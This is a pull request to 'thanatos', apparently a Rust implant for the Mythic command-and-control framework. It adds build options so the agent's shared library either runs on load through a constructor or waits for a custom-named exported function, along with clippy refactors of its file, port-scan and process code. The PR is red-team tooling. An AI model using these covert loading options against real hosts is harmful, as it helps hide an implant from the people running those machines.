### PR TITLE
Extra configuration options for building shared libraries

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,15 @@ This changelog file adheres to [keepachangelog](https://keepachangelog.com/en/1.
 
 ## [Unreleased]
 
+### Added
+
+- Configuration options for building the shared library which modify how it can be loaded [1cd04aa](https://github.com/MythicAgents/thanatos/commit/1cd04aa22203dad47ff3c02eee12b049cd2d0d1d).
+
+#### Changed
+
+- Update `mythic-container` python dependency to 0.4.19 [4dc6582](https://github.com/MythicAgents/thanatos/commit/4dc6582b671e9072cc1f0b07e0163a55ffb3602c).
+- Refactor `portscan.rs` to satisfy clippy lints [e1a16d0](https://github.com/MythicAgents/thanatos/commit/e1a16d0fe2c2596df819f7020e80c52cb0bf94db).
+
 ## [0.1.12] - 2025-05-18
 
 ### Fixed

--- a/Payload_Type/thanatos/requirements.txt
+++ b/Payload_Type/thanatos/requirements.txt
@@ -1,1 +1,1 @@
-mythic-container==0.3.4
+mythic-container==0.4.19

--- a/Payload_Type/thanatos/thanatos/agent_code/Cargo.toml
+++ b/Payload_Type/thanatos/thanatos/agent_code/Cargo.toml
@@ -1,19 +1,12 @@
+[workspace]
+members = ["shared"]
+
 [package]
 name = "thanatos"
 version = "0.1.12"
 authors = ["Matt Ehrnschwender (@M_alphaaa)"]
 edition = "2021"
 
-
-[lib]
-name = "thanatos"
-path = "src/lib.rs"
-crate-type = ["cdylib", "lib"]
-
-
-[[bin]]
-name = "thanatos"
-path = "src/main.rs"
 
 [profile.release]
 strip = "symbols"
@@ -24,7 +17,6 @@ base64 = "0.13"
 block-modes = "0.8.1"
 cfg-if = "1.0"
 chrono = "0.4"
-ctor = "0.1.21"
 hmac = "0.11"
 path-clean = "0.1.0"
 rand = "0.8"

--- a/Payload_Type/thanatos/thanatos/agent_code/shared/Cargo.toml
+++ b/Payload_Type/thanatos/thanatos/agent_code/shared/Cargo.toml
@@ -1,0 +1,16 @@
+[package]
+name = "thanatos_shared"
+version = "0.1.0"
+edition = "2021"
+
+[lib]
+name = "thanatos_shared"
+crate-type = ["cdylib"]
+
+[dependencies]
+thanatos = { path = ".." }
+ctor = { version = "0.4.2", optional = true }
+
+[features]
+onload = ["dep:ctor"]
+user = []

--- a/Payload_Type/thanatos/thanatos/agent_code/shared/build.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/shared/build.rs
@@ -1,0 +1,29 @@
+use std::{
+    io::{BufWriter, Write},
+    path::PathBuf,
+};
+
+fn main() {
+    if std::env::var_os("CARGO_FEATURE_USER").is_none() {
+        return;
+    }
+
+    let out_dir = PathBuf::from(std::env::var("OUT_DIR").unwrap());
+
+    let entrypoint_name = std::env::var("THANATOS_SHARED_ENTRYPOINT")
+        .unwrap_or_else(|_| panic!("THANATOS_SHARED_ENTRYPOINT environment variable is not set."));
+
+    let mut userfile = BufWriter::new(std::fs::File::create(out_dir.join("user.rs")).unwrap());
+
+    writeln!(
+        userfile,
+        r#"
+#[unsafe(no_mangle)]
+extern "system" fn {entrypoint}() {{
+    let _ = thanatos::real_main();
+}}
+"#,
+        entrypoint = entrypoint_name,
+    )
+    .unwrap();
+}

--- a/Payload_Type/thanatos/thanatos/agent_code/shared/src/lib.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/shared/src/lib.rs
@@ -1,0 +1,14 @@
+#[cfg(all(feature = "onload", not(feature = "user")))]
+#[ctor::ctor]
+pub fn run() {
+    let _ = thanatos::real_main();
+}
+
+#[cfg(all(not(feature = "onload"), not(feature = "user")))]
+#[unsafe(no_mangle)]
+extern "system" fn entrypoint() {
+    let _ = thanatos::real_main();
+}
+
+#[cfg(feature = "user")]
+include!(concat!(env!("OUT_DIR"), "/user.rs"));

--- a/Payload_Type/thanatos/thanatos/agent_code/src/cp.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/cp.rs
@@ -3,7 +3,6 @@ use crate::mythic_success;
 use crate::utils::unverbatim;
 use serde::Deserialize;
 use std::error::Error;
-use std::io::ErrorKind;
 use std::path::Path;
 use std::result::Result;
 
@@ -30,8 +29,7 @@ pub fn copy_file(task: &AgentTask) -> Result<serde_json::Value, Box<dyn Error>> 
 
     // Check if the source path exists
     if !s_path.exists() {
-        return Err(Box::new(std::io::Error::new(
-            ErrorKind::Other,
+        return Err(Box::new(std::io::Error::other(
             "Source path does not exist.",
         )));
     }

--- a/Payload_Type/thanatos/thanatos/agent_code/src/download.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/download.rs
@@ -125,7 +125,7 @@ pub fn download_file(
     let params: ContinuedData = serde_json::from_str(&task.parameters)?;
     let file_id: String = params
         .file_id
-        .ok_or_else(|| std::io::Error::new(std::io::ErrorKind::Other, "No file id"))?;
+        .ok_or_else(|| std::io::Error::other("No file id"))?;
 
     // Iterate over the file data sending up the chunks
     for num in 0..total_chunks {

--- a/Payload_Type/thanatos/thanatos/agent_code/src/lib.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/lib.rs
@@ -155,10 +155,3 @@ fn run_beacon() -> Result<(), Box<dyn Error>> {
 
     Ok(())
 }
-
-/// Run the agent in a new thread (if loading from a shared library)
-#[ctor::ctor]
-#[cfg(crate_type = "cdylib")]
-fn run() {
-    std::thread::spawn(|| real_main().unwrap());
-}

--- a/Payload_Type/thanatos/thanatos/agent_code/src/ls/ls_windows.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/ls/ls_windows.rs
@@ -112,11 +112,8 @@ fn get_username_from_sid(sid: PSID) -> Option<String> {
     }
 
     // Create new buffers to hold the account and domain information
-    let mut acct_name: Vec<u8> = Vec::new();
-    acct_name.resize(dw_acct_name as usize, 0);
-
-    let mut domain_name: Vec<u8> = Vec::new();
-    domain_name.resize(dw_domain_name as usize, 0);
+    let mut acct_name = vec![0; dw_acct_name as usize];
+    let mut domain_name = vec![0; dw_domain_name as usize];
 
     // Grab the domain and owner attached to the file
     if unsafe {
@@ -199,7 +196,7 @@ pub fn get_file_owner(fname: &path::Path) -> String {
     }
 
     // Convert the SID to a username
-    get_username_from_sid(psid_owner).unwrap_or_else(|| "".to_string())
+    get_username_from_sid(psid_owner).unwrap_or_default()
 }
 
 impl FilePermissions {
@@ -223,16 +220,12 @@ impl FilePermissions {
         };
 
         // Get the creation date timestamp
-        let creation_date = fpath
-            .metadata()
-            .ok()
-            .map(|meta| {
-                meta.created().ok().and_then(|created| {
-                    (created >= std::time::UNIX_EPOCH)
-                        .then(|| DateTime::<Local>::from(created).timestamp())
-                })
+        let creation_date = fpath.metadata().ok().and_then(|meta| {
+            meta.created().ok().and_then(|created| {
+                (created >= std::time::UNIX_EPOCH)
+                    .then(|| DateTime::<Local>::from(created).timestamp())
             })
-            .flatten();
+        });
 
         // Return the file permissions
         FilePermissions {

--- a/Payload_Type/thanatos/thanatos/agent_code/src/ls/mod.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/ls/mod.rs
@@ -120,7 +120,7 @@ impl FileBrowser {
         // Get the last item in the path
         let mut name = String::from(
             path.components()
-                .last()
+                .next_back()
                 .ok_or("")?
                 .as_os_str()
                 .to_string_lossy(),
@@ -219,7 +219,7 @@ impl File {
             }
         } else {
             path.components()
-                .last()
+                .next_back()
                 .ok_or("")?
                 .as_os_str()
                 .to_string_lossy()

--- a/Payload_Type/thanatos/thanatos/agent_code/src/mv.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/mv.rs
@@ -3,7 +3,6 @@ use crate::mythic_success;
 use crate::utils::unverbatim;
 use serde::Deserialize;
 use std::error::Error;
-use std::io::ErrorKind;
 use std::path::Path;
 use std::result::Result;
 
@@ -30,8 +29,7 @@ pub fn move_file(task: &AgentTask) -> Result<serde_json::Value, Box<dyn Error>> 
 
     // Check if the source path exists
     if !s_path.exists() {
-        return Err(Box::new(std::io::Error::new(
-            ErrorKind::Other,
+        return Err(Box::new(std::io::Error::other(
             "Source path does not exist.",
         )));
     }

--- a/Payload_Type/thanatos/thanatos/agent_code/src/payloadvars.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/payloadvars.rs
@@ -86,6 +86,6 @@ pub fn working_start() -> NaiveTime {
 
 /// Helper function to get the working hours end time
 pub fn working_end() -> NaiveTime {
-    let endtime = env!("working_hours").split('-').last().unwrap();
+    let endtime = env!("working_hours").split('-').next_back().unwrap();
     NaiveTime::parse_from_str(endtime, "%H:%M").unwrap()
 }

--- a/Payload_Type/thanatos/thanatos/agent_code/src/portscan.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/portscan.rs
@@ -2,7 +2,6 @@ use crate::agent::AgentTask;
 use crate::{mythic_continued, mythic_success};
 use serde::Deserialize;
 use std::error::Error;
-use std::io::ErrorKind;
 use std::net::{Ipv4Addr, SocketAddr, TcpStream};
 use std::result::Result;
 use std::str::FromStr;
@@ -120,16 +119,18 @@ pub fn scan_ports(
 /// * `subnet` - Subnet to parse
 fn parse_subnet(subnet: String) -> Result<Vec<Ipv4Addr>, Box<dyn Error>> {
     // Get the cidr of the subnet
-    let cidr =
-        u32::from_str(subnet.split('/').last().ok_or_else(|| {
-            std::io::Error::new(ErrorKind::Other, "Failed to parse subnet mask")
-        })?)?;
+    let cidr = u32::from_str(
+        subnet
+            .split('/')
+            .next_back()
+            .ok_or_else(|| std::io::Error::other("Failed to parse subnet mask"))?,
+    )?;
 
     // Get the subnet IP
     let ipaddr = subnet
         .split('/')
         .next()
-        .ok_or_else(|| std::io::Error::new(ErrorKind::Other, "Failed to parse ip address"))?;
+        .ok_or_else(|| std::io::Error::other("Failed to parse ip address"))?;
 
     // Convert the string IP into an integer
     let raw_ip: u32 = Ipv4Addr::from_str(ipaddr)?.into();

--- a/Payload_Type/thanatos/thanatos/agent_code/src/portscan.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/portscan.rs
@@ -49,7 +49,7 @@ pub fn scan_ports(
             let end = range[1];
 
             // Add the range of ports to the port list
-            ports.append(&mut (start..=end).map(u16::from).collect());
+            ports.append(&mut (start..=end).collect());
 
             continue;
         }

--- a/Payload_Type/thanatos/thanatos/agent_code/src/ps/linux_ps.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/ps/linux_ps.rs
@@ -32,7 +32,7 @@ pub fn get_process_ids() -> Result<Vec<u32>, Box<dyn Error>> {
         }
 
         // Try to grab the last element of the path
-        if let Some(ending) = path.components().last() {
+        if let Some(ending) = path.components().next_back() {
             // Convert the last element of the path to a string
             if let Some(ending) = ending.as_os_str().to_str() {
                 // Try to parse the path into an integer and add it to the list of pids

--- a/Payload_Type/thanatos/thanatos/agent_code/src/ps/mod.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/ps/mod.rs
@@ -98,7 +98,7 @@ pub fn get_process_list(task: &AgentTask) -> Result<serde_json::Value, Box<dyn E
         s.get(start..end)
             .unwrap_or("btime 0")
             .split(' ')
-            .last()
+            .next_back()
             .unwrap_or("0")
             .parse()
             .unwrap_or(0)

--- a/Payload_Type/thanatos/thanatos/agent_code/src/ssh/download.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/ssh/download.rs
@@ -108,7 +108,7 @@ pub fn download_file(
     let params: ContinuedData = serde_json::from_str(&task.parameters)?;
     let file_id = params
         .file_id
-        .ok_or_else(|| std::io::Error::new(std::io::ErrorKind::Other, "No file id"))?;
+        .ok_or_else(|| std::io::Error::other("No file id"))?;
 
     // Continue sending chunks of the file to Mythic
     for num in 0..total_chunks {

--- a/Payload_Type/thanatos/thanatos/agent_code/src/ssh/ls.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/ssh/ls.rs
@@ -124,7 +124,7 @@ impl File {
         } else {
             String::from(
                 path.components()
-                    .last()
+                    .next_back()
                     .ok_or("")?
                     .as_os_str()
                     .to_string_lossy(),
@@ -156,7 +156,7 @@ impl FileBrowser {
         let path = Path::new(&path);
         let mut name = String::from(
             path.components()
-                .last()
+                .next_back()
                 .ok_or("")?
                 .as_os_str()
                 .to_string_lossy(),

--- a/Payload_Type/thanatos/thanatos/agent_code/src/upload.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/upload.rs
@@ -5,7 +5,6 @@ use serde::Deserialize;
 use serde_json::json;
 use std::error::Error;
 use std::io::prelude::*;
-use std::io::ErrorKind;
 use std::path::Path;
 use std::result::Result;
 use std::sync::mpsc;
@@ -63,10 +62,11 @@ pub fn upload_file(
     let continued_args: ContinuedData = serde_json::from_str(&task.parameters)?;
 
     // Store the upload file chunk data
-    let mut file_data: Vec<u8> =
-        base64::decode(continued_args.chunk_data.ok_or_else(|| {
-            std::io::Error::new(ErrorKind::Other, "Failed to get file chunk data")
-        })?)?;
+    let mut file_data: Vec<u8> = base64::decode(
+        continued_args
+            .chunk_data
+            .ok_or_else(|| std::io::Error::other("Failed to get file chunk data"))?,
+    )?;
 
     // Get the total chunks
     let total_chunks = continued_args.total_chunks.unwrap();

--- a/Payload_Type/thanatos/thanatos/agent_code/src/utils/windows.rs
+++ b/Payload_Type/thanatos/thanatos/agent_code/src/utils/windows.rs
@@ -38,7 +38,7 @@ pub mod whoami {
     pub fn username() -> Option<String> {
         let mut name_len = 0;
         // Call `GetUserNameW` to get the username length
-        let _ = unsafe {
+        unsafe {
             GetUserNameW(std::ptr::null_mut(), &mut name_len);
         };
 
@@ -71,7 +71,7 @@ pub mod whoami {
     pub fn hostname() -> Option<String> {
         let mut name_len = 0;
         // Get the computer name length
-        let _ = unsafe {
+        unsafe {
             GetComputerNameExW(ComputerNameDnsHostname, std::ptr::null_mut(), &mut name_len);
         };
 
@@ -278,10 +278,10 @@ pub fn get_checkin_info() -> String {
     // Grab the initial checkin information for Windows hosts
     let info = CheckinInfo {
         action: "checkin".to_string(),
-        ip: crate::utils::local_ipaddress::get().unwrap_or_else(|| "".to_string()),
+        ip: crate::utils::local_ipaddress::get().unwrap_or_default(),
         os: whoami::platform(),
-        user: whoami::username().unwrap_or_else(|| "".to_string()),
-        host: whoami::hostname().unwrap_or_else(|| "".to_string()),
+        user: whoami::username().unwrap_or_default(),
+        host: whoami::hostname().unwrap_or_default(),
         pid: std::process::id(),
         uuid: crate::payloadvars::payload_uuid(),
         architecture: std::env::consts::ARCH.to_string(),


### PR DESCRIPTION
This adds additional payload build configuration options when building a shared library.

Allows control over how the library is loaded. The library can be configured to run immediately when it is loaded or require invoking an exported function in order to run it.

Another configuration option allows the user to modify the name of the exported function required to start the agent.